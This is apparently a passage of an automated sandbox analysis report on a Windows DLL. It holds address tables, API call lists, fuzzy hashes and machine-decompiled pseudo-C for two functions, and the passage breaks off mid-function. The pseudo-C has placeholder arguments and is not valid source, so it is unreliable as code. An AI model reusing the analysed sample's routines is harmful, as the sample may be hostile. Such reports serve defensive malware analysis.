                                                                                                                                                  0x6770c17a
                                                                                                                                                  0x6770c17f
                                                                                                                                                  0x6770c185
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c187
                                                                                                                                                  0x6770c18d
                                                                                                                                                  0x6770c191
                                                                                                                                                  0x6770c197
                                                                                                                                                  0x6770c197
                                                                                                                                                  0x6770c1a8
                                                                                                                                                  0x6770c1af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c1af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c18d
                                                                                                                                                  0x6770c1ce

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 6770ADA8: _errno.LIBCMT ref: 6770ADCB
                                                                                                                                                  • Sleep.KERNEL32(?,?,?,67708DEF,?,?,?,67708525,?,?,?,?,6770707E), ref: 6770C191
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1068366078-0
                                                                                                                                                  • Opcode ID: 56c161814b2fbc3ecd3ae965f6cc56d182ab4e620d6e0e541d69f04c7e524371
                                                                                                                                                  • Instruction ID: f09779f061a3b0d96644cc3d5132b687949568cb7314d0a9e5366760e3eebc70
                                                                                                                                                  • Opcode Fuzzy Hash: 56c161814b2fbc3ecd3ae965f6cc56d182ab4e620d6e0e541d69f04c7e524371
                                                                                                                                                  • Instruction Fuzzy Hash: 750181B2324A8496E6448B16995024DB7B5F788FE1F5A4621DF5D07B54CB39D861CB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 67702BE0, Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 281stringCOMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                  			E67702BE0(void* __ecx, void* __edx, void* __edi, void* __esp, long long __rbx, long long __rcx, int __rdx, void* __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				int _t100;
				int _t108;
				int _t111;
				int _t139;
				signed short _t140;
				int _t141;
				signed short _t142;
				int _t148;
				signed int _t149;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				signed long long _t191;
				signed long long _t192;
				void* _t218;
				signed long long _t241;
				void* _t254;
				void* _t266;
				void* _t267;
				void* _t269;
				signed short* _t272;
				signed short* _t273;
				signed long long _t274;
				void* _t277;
				void* _t279;
				signed long long _t280;
				void* _t287;
				void* _t288;
				signed long long _t290;
				signed long long _t294;
				signed long long _t298;
				signed long long _t299;
				signed long long _t303;

				_t285 = __r9;
				_t282 = __r8;
				_t183 = __esp;
				_t174 = __edi;
				_t171 = __edx;
				_t151 = __ecx;
				 *((long long*)(_t279 + 0x18)) = __rbx;
				_push(_t274);
				_t277 = _t279 - 0xa10;
				_t280 = _t279 - 0xb10;
				_t191 =  *0x67716000; // 0x9b7b11e8241
				_t192 = _t191 ^ _t280;
				 *(_t277 + 0xa00) = _t192;
				_t196 = __rdx;
				 *((long long*)(_t280 + 0x30)) = __rcx;
				E67703E48();
				if(_t192 != 0) {
					lstrcpyW();
					free(??);
					__eflags = __rdx;
					if(__eflags == 0) {
						E67704338(__ecx, __edx, _t182, __eflags, __rdx, _t277 + 0x450, _t274, __r8, __r9, _t288);
					} else {
						E67708060(_t192, __rdx, __rdx, _t274, __r9);
					}
					_t290 = _t192;
					__eflags = _t192;
					if(_t192 == 0) {
						goto L1;
					} else {
						E677030C4(_t151, _t171, _t196, _t277 + 0x450, _t274, _t277);
						_t294 = _t192;
						__eflags = _t192;
						if(__eflags != 0) {
							 *((intOrPtr*)(_t280 + 0x2c)) = lstrlenW();
							lstrcatW(??, ??);
							E67701160(__eflags, _t192, _t196, "b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae059", _t274, _t282);
							 *(_t280 + 0x38) = _t192;
							 *(_t280 + 0x28) = lstrlenW(??);
							_t100 = lstrlenW(??);
							_t148 = 0;
							__eflags = 0;
							 *(_t280 + 0x20) = 0;
							 *((long long*)(_t280 + 0x40)) = _t100;
							do {
								_t266 = _t280 + 0x50;
								memset(_t174, 0, 0x27a << 0);
								_t184 = _t183 + 0xc;
								_t175 = _t174 + 0x27a;
								lstrcpyW(??, ??);
								__eflags = _t148;
								if(_t148 == 0) {
									r14d = 0;
									__eflags = r14d;
								} else {
									E6770532C(4, _t192, _t196, _t274);
									_t175 =  *( *(_t192 + 8));
									E677039E8(_t175, _t184, _t192, _t196, _t192, _t266);
									__eflags = _t175;
									if(_t175 < 0) {
										_t175 =  ~_t175;
									}
									asm("cdq");
									_t192 =  *((intOrPtr*)(_t280 + 0x40));
									r14d = 0;
									 *((short*)(_t280 + 0x50 + _t192 * 2)) =  *(_t298 + _t175 %  *(_t280 + 0x28) * 2) & 0x0000ffff;
									 *((intOrPtr*)(_t280 + 0x52 + _t192 * 2)) = r14w;
								}
								lstrcatW();
								_t267 = _t277 + 0x1d0;
								_t254 = _t280 + 0x50;
								memset(_t175, 0, 0x27c << 0);
								_t185 = _t184 + 0xc;
								_t176 = _t175 + 0x27c;
								lstrcpyW(??, ??);
								_t218 = _t277 + 0x1d0;
								_t149 = r14d;
								_t108 = lstrlenW(??);
								__eflags = _t108;
								if(_t108 > 0) {
									_t273 = _t277 + 0x1d0;
									do {
										_t142 = E67707900( *_t273 & 0x0000ffff, _t176, _t192, _t196, _t218, _t254, _t273, _t274, _t285, _t287, _t288, _t290);
										_t218 = _t277 + 0x1d0;
										_t149 = _t149 + 1;
										 *_t273 = _t142;
										_t273 =  &(_t273[1]);
										_t108 = lstrlenW(??);
										__eflags = _t149 - _t108;
									} while (_t149 < _t108);
								}
								_t303 = _t294;
								 *(_t280 + 0x24) = r14d;
								while(1) {
									E67707920(_t108, _t303, "\n");
									 *(_t280 + 0x48) = _t192;
									__eflags = _t192;
									if(_t192 == 0) {
										break;
									}
									_t196 = _t192 - _t303 >> 1;
									_t176 = (_t192 - _t303 >> 1) + (_t192 - _t303 >> 1);
									malloc(??);
									_t299 = _t192;
									_t261 = _t303;
									 *((short*)(_t299 + _t149 * 2)) = 0;
									E6770ED80(_t267 + 2, _t299, _t303, _t176);
									r15d = 0;
									_t241 = _t299;
									_t149 = r15d;
									_t139 = lstrlenW(??);
									__eflags = _t139;
									if(_t139 > 0) {
										_t272 = _t299;
										do {
											_t140 = E67707900( *_t272 & 0x0000ffff, _t176, _t192, _t196, _t241, _t261, _t272, _t274, _t285, _t287, _t288, _t290);
											_t241 = _t299;
											_t149 = _t149 + 1;
											 *_t272 = _t140;
											_t272 =  &(_t272[1]);
											_t141 = lstrlenW(??);
											__eflags = _t149 - _t141;
										} while (_t149 < _t141);
									}
									_t108 = lstrcmpW();
									__eflags = _t108;
									if(_t108 == 0) {
										 *(_t280 + 0x24) = 1;
										free(??);
									} else {
										free();
										_t192 =  *((intOrPtr*)(_t280 + 0x2c));
										_t303 =  *(_t280 + 0x48) + 2;
										__eflags = _t303 - _t294 + _t192 * 2;
										if(_t303 < _t294 + _t192 * 2) {
											continue;
										} else {
											break;
										}
									}
									L25:
									_t111 = memset(_t176, 0, 0x27c << 0);
									_t186 = _t185 + 0xc;
									_t177 = _t176 + 0x27c;
									__eflags =  *(_t280 + 0x24) - r15d;
									if( *(_t280 + 0x24) == r15d) {
										lstrlenW();
										malloc(??);
										_t274 = _t192;
										lstrcpyW(??, ??);
										_t298 =  *(_t280 + 0x38);
										_t269 = _t280 + 0x50;
										__eflags = 0;
										memset(_t177, 0, 0x27a << 0);
										_t187 = _t186 + 0xc;
										_t178 = _t177 + 0x27a;
									} else {
										goto L26;
									}
									L30:
									__eflags = _t298;
									if(_t298 != 0) {
										free();
									}
									free();
									__eflags = _t274;
									if(_t274 == 0) {
										r8d = 0;
										GetTempFileNameW(??, ??, ??, ??);
										lstrlenW(??);
										_t72 = _t192 - 5; // -5
										_t180 = _t72;
										lstrlenW(??);
										_t74 = _t192 + 2; // 0x2
										malloc(??);
										 *((intOrPtr*)(_t192 + _t180 * 2)) = r15w;
										_t274 = _t192;
										E6770ED80(_t192 + _t74, _t274, _t277 + 0x752, _t269 + _t269);
										__eflags = 0;
										memset(_t180, 0, 0x2ae << 0);
										_t187 = _t187 + 0xc;
										_t178 = _t180 + 0x2ae;
										lstrcatW(??, ??);
									}
									lstrcatW();
									__eflags = _t274;
									if(_t274 != 0) {
										free();
									}
									free();
									lstrlenW(??);
									malloc(??);
									lstrcpyW(??, ??);
									__eflags = 0;
									memset(_t178, 0, 0x300 << 0);
									_t151 = 0;
									goto L37;
								}
								r15d = 0;
								__eflags = r15d;
								goto L25;
								L26:
								_t298 =  *(_t280 + 0x38);
								_t148 =  *(_t280 + 0x20) + 1;
								_t269 = _t280 + 0x50;
								memset(_t177, _t111, 0x27a << 0);
								_t183 = _t186 + 0xc;
								_t174 = _t177 + 0x27a;
								 *(_t280 + 0x20) = _t148;
								__eflags = _t148 - 0x1f;
							} while (_t148 < 0x1f);
							r15d = 0;
							goto L30;
						} else {
							free();
							goto L1;
						}
					}
				} else {
					L1:
				}
				L37:
				return E67706F80(_t151,  *(_t277 + 0xa00) ^ _t280);
			}

















































                                                                                                                                                  0x67702be0
                                                                                                                                                  0x67702be0
                                                                                                                                                  0x67702be0
                                                                                                                                                  0x67702be0
                                                                                                                                                  0x67702be0
                                                                                                                                                  0x67702be0
                                                                                                                                                  0x67702be0
                                                                                                                                                  0x67702be6
                                                                                                                                                  0x67702bf0
                                                                                                                                                  0x67702bf8
                                                                                                                                                  0x67702bff
                                                                                                                                                  0x67702c06
                                                                                                                                                  0x67702c09
                                                                                                                                                  0x67702c10
                                                                                                                                                  0x67702c16
                                                                                                                                                  0x67702c1b
                                                                                                                                                  0x67702c28
                                                                                                                                                  0x67702c3b
                                                                                                                                                  0x67702c44
                                                                                                                                                  0x67702c49
                                                                                                                                                  0x67702c4c
                                                                                                                                                  0x67702c5f
                                                                                                                                                  0x67702c4e
                                                                                                                                                  0x67702c51
                                                                                                                                                  0x67702c51
                                                                                                                                                  0x67702c64
                                                                                                                                                  0x67702c67
                                                                                                                                                  0x67702c6a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702c6c
                                                                                                                                                  0x67702c73
                                                                                                                                                  0x67702c78
                                                                                                                                                  0x67702c7b
                                                                                                                                                  0x67702c7e
                                                                                                                                                  0x67702ca1
                                                                                                                                                  0x67702ca5
                                                                                                                                                  0x67702cb2
                                                                                                                                                  0x67702cbd
                                                                                                                                                  0x67702ccb
                                                                                                                                                  0x67702ccf
                                                                                                                                                  0x67702cd5
                                                                                                                                                  0x67702cd5
                                                                                                                                                  0x67702cda
                                                                                                                                                  0x67702cde
                                                                                                                                                  0x67702ce3
                                                                                                                                                  0x67702ce5
                                                                                                                                                  0x67702cef
                                                                                                                                                  0x67702cef
                                                                                                                                                  0x67702cef
                                                                                                                                                  0x67702cf9
                                                                                                                                                  0x67702cff
                                                                                                                                                  0x67702d01
                                                                                                                                                  0x67702d45
                                                                                                                                                  0x67702d45
                                                                                                                                                  0x67702d03
                                                                                                                                                  0x67702d08
                                                                                                                                                  0x67702d11
                                                                                                                                                  0x67702d16
                                                                                                                                                  0x67702d1b
                                                                                                                                                  0x67702d1d
                                                                                                                                                  0x67702d1f
                                                                                                                                                  0x67702d1f
                                                                                                                                                  0x67702d23
                                                                                                                                                  0x67702d30
                                                                                                                                                  0x67702d35
                                                                                                                                                  0x67702d38
                                                                                                                                                  0x67702d3d
                                                                                                                                                  0x67702d3d
                                                                                                                                                  0x67702d50
                                                                                                                                                  0x67702d58
                                                                                                                                                  0x67702d64
                                                                                                                                                  0x67702d69
                                                                                                                                                  0x67702d69
                                                                                                                                                  0x67702d69
                                                                                                                                                  0x67702d72
                                                                                                                                                  0x67702d78
                                                                                                                                                  0x67702d7f
                                                                                                                                                  0x67702d82
                                                                                                                                                  0x67702d88
                                                                                                                                                  0x67702d8a
                                                                                                                                                  0x67702d8c
                                                                                                                                                  0x67702d93
                                                                                                                                                  0x67702d96
                                                                                                                                                  0x67702d9b
                                                                                                                                                  0x67702da2
                                                                                                                                                  0x67702da4
                                                                                                                                                  0x67702da7
                                                                                                                                                  0x67702dab
                                                                                                                                                  0x67702db1
                                                                                                                                                  0x67702db1
                                                                                                                                                  0x67702d93
                                                                                                                                                  0x67702db5
                                                                                                                                                  0x67702db8
                                                                                                                                                  0x67702dbd
                                                                                                                                                  0x67702dc7
                                                                                                                                                  0x67702dcc
                                                                                                                                                  0x67702dd1
                                                                                                                                                  0x67702dd4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702de0
                                                                                                                                                  0x67702de3
                                                                                                                                                  0x67702dec
                                                                                                                                                  0x67702df7
                                                                                                                                                  0x67702dfc
                                                                                                                                                  0x67702dff
                                                                                                                                                  0x67702e07
                                                                                                                                                  0x67702e0c
                                                                                                                                                  0x67702e0f
                                                                                                                                                  0x67702e12
                                                                                                                                                  0x67702e15
                                                                                                                                                  0x67702e1b
                                                                                                                                                  0x67702e1d
                                                                                                                                                  0x67702e1f
                                                                                                                                                  0x67702e22
                                                                                                                                                  0x67702e25
                                                                                                                                                  0x67702e2a
                                                                                                                                                  0x67702e2d
                                                                                                                                                  0x67702e2f
                                                                                                                                                  0x67702e32
                                                                                                                                                  0x67702e36
                                                                                                                                                  0x67702e3c
                                                                                                                                                  0x67702e3c
                                                                                                                                                  0x67702e22
                                                                                                                                                  0x67702e4a
                                                                                                                                                  0x67702e53
                                                                                                                                                  0x67702e55
                                                                                                                                                  0x67702ec0
                                                                                                                                                  0x67702ec8
                                                                                                                                                  0x67702e57
                                                                                                                                                  0x67702e57
                                                                                                                                                  0x67702e5c
                                                                                                                                                  0x67702e6b
                                                                                                                                                  0x67702e6f
                                                                                                                                                  0x67702e72
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702e72
                                                                                                                                                  0x67702e7b
                                                                                                                                                  0x67702e89
                                                                                                                                                  0x67702e89
                                                                                                                                                  0x67702e89
                                                                                                                                                  0x67702e8b
                                                                                                                                                  0x67702e90
                                                                                                                                                  0x67702ed4
                                                                                                                                                  0x67702ee1
                                                                                                                                                  0x67702eee
                                                                                                                                                  0x67702ef1
                                                                                                                                                  0x67702ef7
                                                                                                                                                  0x67702efc
                                                                                                                                                  0x67702f01
                                                                                                                                                  0x67702f08
                                                                                                                                                  0x67702f08
                                                                                                                                                  0x67702f08
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702f0a
                                                                                                                                                  0x67702f0a
                                                                                                                                                  0x67702f0d
                                                                                                                                                  0x67702f12
                                                                                                                                                  0x67702f12
                                                                                                                                                  0x67702f1a
                                                                                                                                                  0x67702f1f
                                                                                                                                                  0x67702f22
                                                                                                                                                  0x67702f36
                                                                                                                                                  0x67702f3b
                                                                                                                                                  0x67702f48
                                                                                                                                                  0x67702f56
                                                                                                                                                  0x67702f56
                                                                                                                                                  0x67702f59
                                                                                                                                                  0x67702f61
                                                                                                                                                  0x67702f68
                                                                                                                                                  0x67702f77
                                                                                                                                                  0x67702f7c
                                                                                                                                                  0x67702f88
                                                                                                                                                  0x67702f8d
                                                                                                                                                  0x67702f9e
                                                                                                                                                  0x67702f9e
                                                                                                                                                  0x67702f9e
                                                                                                                                                  0x67702fa3
                                                                                                                                                  0x67702fa3
                                                                                                                                                  0x67702fb3
                                                                                                                                                  0x67702fb9
                                                                                                                                                  0x67702fbc
                                                                                                                                                  0x67702fc1
                                                                                                                                                  0x67702fc1
                                                                                                                                                  0x67702fc9
                                                                                                                                                  0x67702fd5
                                                                                                                                                  0x67702fe2
                                                                                                                                                  0x67702ff4
                                                                                                                                                  0x67702ffa
                                                                                                                                                  0x67703008
                                                                                                                                                  0x67703008
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770300a
                                                                                                                                                  0x67702e78
                                                                                                                                                  0x67702e78
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702e92
                                                                                                                                                  0x67702e96
                                                                                                                                                  0x67702ea0
                                                                                                                                                  0x67702ea2
                                                                                                                                                  0x67702eac
                                                                                                                                                  0x67702eac
                                                                                                                                                  0x67702eac
                                                                                                                                                  0x67702eae
                                                                                                                                                  0x67702eb2
                                                                                                                                                  0x67702eb2
                                                                                                                                                  0x67702ebb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702c80
                                                                                                                                                  0x67702c83
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702c83
                                                                                                                                                  0x67702c7e
                                                                                                                                                  0x67702c2a
                                                                                                                                                  0x67702c2a
                                                                                                                                                  0x67702c2a
                                                                                                                                                  0x6770300d
                                                                                                                                                  0x67703036

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67703E48: free.LIBCMT ref: 67703E77
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67702C3B
                                                                                                                                                  • free.LIBCMT ref: 67702C44
                                                                                                                                                  • free.LIBCMT ref: 67702C83
                                                                                                                                                    • Part of subcall function 67704338: lstrlenW.KERNEL32 ref: 6770436E
                                                                                                                                                    • Part of subcall function 67704338: lstrcpynW.KERNEL32 ref: 67704388
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702C8D
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67702CA5
                                                                                                                                                    • Part of subcall function 67701160: MultiByteToWideChar.KERNEL32 ref: 67701190
                                                                                                                                                    • Part of subcall function 67701160: malloc.LIBCMT ref: 6770119E
                                                                                                                                                    • Part of subcall function 67701160: MultiByteToWideChar.KERNEL32 ref: 677011BD
                                                                                                                                                    • Part of subcall function 67701160: free.LIBCMT ref: 677011C6
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702CC2
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702CCF
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67702CF9
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67702D50
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67702D72
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702D82
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702DAB
                                                                                                                                                  • malloc.LIBCMT ref: 67702DEC
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702E15
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702E36
                                                                                                                                                  • lstrcmpW.KERNEL32 ref: 67702E4A
                                                                                                                                                  • free.LIBCMT ref: 67702E57
                                                                                                                                                    • Part of subcall function 6770532C: malloc.LIBCMT ref: 67705342
                                                                                                                                                    • Part of subcall function 6770532C: malloc.LIBCMT ref: 6770534C
                                                                                                                                                    • Part of subcall function 6770532C: CryptGenRandom.ADVAPI32(?,?,00000000,67704A26,?,?,?,6770147B), ref: 67705366
                                                                                                                                                    • Part of subcall function 6770532C: free.LIBCMT ref: 67705373
                                                                                                                                                    • Part of subcall function 6770532C: free.LIBCMT ref: 6770537B
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • free.LIBCMT ref: 67702EC8
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702ED4
                                                                                                                                                  • malloc.LIBCMT ref: 67702EE1
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67702EF1
                                                                                                                                                  • free.LIBCMT ref: 67702F12
                                                                                                                                                  • free.LIBCMT ref: 67702F1A
                                                                                                                                                  • GetTempFileNameW.KERNEL32 ref: 67702F3B
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702F48
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702F59
                                                                                                                                                  • malloc.LIBCMT ref: 67702F68
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67702FA3
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67702FB3
                                                                                                                                                  • free.LIBCMT ref: 67702FC1
                                                                                                                                                  • free.LIBCMT ref: 67702FC9
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67702FD5
                                                                                                                                                  • malloc.LIBCMT ref: 67702FE2
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67702FF4
                                                                                                                                                  Strings
                                                                                                                                                  • b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae059, xrefs: 67702CAB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$lstrlen$malloc$lstrcpy$lstrcat$ByteCharMultiWide$CryptFileNameRandomTemplstrcmplstrcpyn
                                                                                                                                                  • String ID: b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae059
                                                                                                                                                  • API String ID: 198835641-1751625055
                                                                                                                                                  • Opcode ID: 20a9189b312d186ac85307f12007e3d4d3752960989d1fe77129330a3bb622a6
                                                                                                                                                  • Instruction ID: 29292e5a52dfc74eab75c4f635a01e14cea0435773aea4e0344432f3184d747d
                                                                                                                                                  • Opcode Fuzzy Hash: 20a9189b312d186ac85307f12007e3d4d3752960989d1fe77129330a3bb622a6
                                                                                                                                                  • Instruction Fuzzy Hash: D8B183B2318A8186DB14DF21E9543AA63E1FB9CB8DF840425DF0E9B718EF79D259C700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770DAEC, Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 465COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                  			E6770DAEC(signed int __ebx, signed int __ecx, signed int __edx, signed int __esi, void* __rax, long long __rbx, signed int __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				signed char _t185;
				signed int _t191;
				signed int _t192;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t205;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t214;
				signed int _t218;
				int _t219;
				signed int _t220;
				void* _t221;
				signed int _t226;
				void* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				void* _t232;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int _t254;
				signed int _t255;
				signed long long _t259;
				signed long long _t260;
				signed long long _t261;
				signed int* _t263;
				intOrPtr _t271;
				signed long long _t275;
				signed short* _t277;
				intOrPtr _t278;
				signed int _t281;
				signed int* _t284;
				signed int _t304;
				intOrPtr _t308;
				signed short* _t309;
				signed long long _t314;
				void* _t316;
				signed int* _t318;
				signed int* _t320;
				void* _t323;
				void* _t325;
				signed long long _t326;
				void* _t328;
				void* _t330;
				signed long long _t339;
				signed short* _t341;
				signed short* _t343;
				void* _t345;
				signed long long _t349;

				_t336 = __r11;
				_t330 = __r9;
				_t328 = __r8;
				_t304 = __rdx;
				_t254 = __esi;
				_t243 = __edx;
				_t240 = __ecx;
				_t236 = __ebx;
				 *((long long*)(_t325 + 0x20)) = __rbx;
				_push(_t316);
				_push(_t314);
				_push(_t345);
				_t323 = _t325 - 0x1a30;
				E6770F8A0(0x1b30, __rax, __r10, __r11);
				_t326 = _t325 - __rax;
				_t259 =  *0x67716000; // 0x9b7b11e8241
				_t260 = _t259 ^ _t326;
				 *(_t323 + 0x1a20) = _t260;
				_t249 = 0;
				r14d = r8d;
				_t343 = __rdx;
				 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0;
				_t275 = __ecx;
				if(r8d != 0) {
					__eflags = __rdx;
					if(__rdx != 0) {
						_t260 = 0x67719900;
						_t339 = __ecx >> 5;
						r15d = r15d & 0x0000001f;
						_t278 =  *((intOrPtr*)(0x67719900 + _t339 * 8));
						 *(_t326 + 0x50) = _t339;
						_t349 = __ecx * 0x58;
						sil =  *(_t349 + _t278 + 0x38);
						 *(_t326 + 0x60) = _t349;
						sil = sil + sil;
						sil = sil >> 1;
						__eflags = sil - 2;
						if(sil == 2) {
							L7:
							_t185 =  !r14d;
							__eflags = _t185 & 0x00000001;
							if((_t185 & 0x00000001) == 0) {
								goto L3;
							}
							L8:
							__eflags =  *(_t349 + _t278 + 8) & 0x00000020;
							if(( *(_t349 + _t278 + 8) & 0x00000020) != 0) {
								_t243 = 0;
								__eflags = 0;
								_t18 = _t304 + 2; // 0x2
								r8d = _t18;
								E6770D970(_t236, _t236, 0, _t260, _t275, _t304);
							}
							_t240 = _t236;
							_t191 = E6770E380(_t240, _t243, _t260);
							__eflags = _t191;
							if(_t191 == 0) {
								L49:
								_t261 = 0x67719900;
								_t281 =  *((intOrPtr*)(0x67719900 + _t339 * 8));
								__eflags =  *(_t349 + _t281 + 8) & 0x00000080;
								if(( *(_t349 + _t281 + 8) & 0x00000080) == 0) {
									 *(_t326 + 0x20) =  *(_t326 + 0x20) & _t314;
									r8d = r14d;
									_t192 = WriteFile(??, ??, ??, ??, ??);
									__eflags = _t192;
									if(_t192 == 0) {
										goto L47;
									}
									_t249 =  *(_t326 + 0x48);
									_t237 = 0;
									goto L90;
								}
								_t237 = 0;
								_t341 = _t343;
								__eflags = sil;
								if(sil != 0) {
									__eflags = sil - 2;
									if(sil != 2) {
										__eflags = r14d;
										if(r14d == 0) {
											goto L98;
										}
										r8d = 0xd;
										do {
											_t284 = _t326 + 0x70;
											__eflags = 0;
											do {
												_t199 = r12d - r13d;
												__eflags = _t199 - r14d;
												if(_t199 >= r14d) {
													break;
												}
												_t199 =  *_t341 & 0x0000ffff;
												_t341 =  &(_t341[1]);
												__eflags = _t199 - 0xa;
												if(_t199 == 0xa) {
													 *_t284 = r8w;
													_t284 =  &(_t284[0]);
													_t304 = _t304 + 2;
													__eflags = _t304;
												}
												_t304 = _t304 + 2;
												 *_t284 = _t199;
												_t284 =  &(_t284[0]);
												__eflags = _t304 - 0x6a8;
											} while (_t304 < 0x6a8);
											 *(_t326 + 0x38) =  *(_t326 + 0x38) & 0x00000000;
											 *(_t326 + 0x30) =  *(_t326 + 0x30) & 0x00000000;
											 *((intOrPtr*)(_t326 + 0x28)) = 0xd55;
											_t200 = _t240 - _t199;
											_t240 = 0xfde9;
											asm("cdq");
											r9d = _t200 >> 1;
											_t261 = _t323 + 0x620;
											 *(_t326 + 0x20) = _t261;
											_t203 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
											r15d = _t203;
											__eflags = _t203;
											if(_t203 == 0) {
												_t237 = GetLastError();
												break;
											}
											_t255 = 0;
											__eflags = 0;
											while(1) {
												 *(_t326 + 0x20) =  *(_t326 + 0x20) & 0x00000000;
												_t304 = _t323 + _t255 + 0x620;
												r8d = r15d;
												_t261 =  *(_t326 + 0x60);
												r8d = r8d - _t255;
												_t205 = WriteFile(??, ??, ??, ??, ??);
												__eflags = _t205;
												if(_t205 == 0) {
													break;
												}
												_t255 = _t255 +  *(_t326 + 0x48);
												__eflags = r15d - _t255;
												if(r15d > _t255) {
													continue;
												}
												L87:
												__eflags = r15d - _t255;
												if(r15d > _t255) {
													goto L89;
												}
												goto L88;
											}
											_t237 = GetLastError();
											goto L87;
											L88:
											r8d = 0xd;
											_t249 = r12d - r13d;
											__eflags = _t249 - r14d;
										} while (_t249 < r14d);
										L89:
										_t349 =  *(_t326 + 0x60);
										goto L90;
									}
									__eflags = r14d;
									if(r14d == 0) {
										goto L98;
									}
									_t246 = 0xd;
									do {
										r15d =  *(_t326 + 0x44);
										_t318 = _t323 + 0x620;
										_t240 = 0;
										__eflags = 0;
										do {
											_t208 = r12d - r13d;
											__eflags = _t208 - r14d;
											if(_t208 >= r14d) {
												break;
											}
											_t208 =  *_t341 & 0x0000ffff;
											_t341 =  &(_t341[1]);
											__eflags = _t208 - 0xa;
											if(_t208 == 0xa) {
												 *_t318 = _t246;
												r15d = r15d + 2;
												_t318 =  &(_t318[0]);
												_t281 = _t281 + 2;
												__eflags = _t281;
											}
											_t281 = _t281 + 2;
											 *_t318 = _t208;
											_t318 =  &(_t318[0]);
											__eflags = _t281 - 0x13fe;
										} while (_t281 < 0x13fe);
										 *(_t326 + 0x20) =  *(_t326 + 0x20) & _t275;
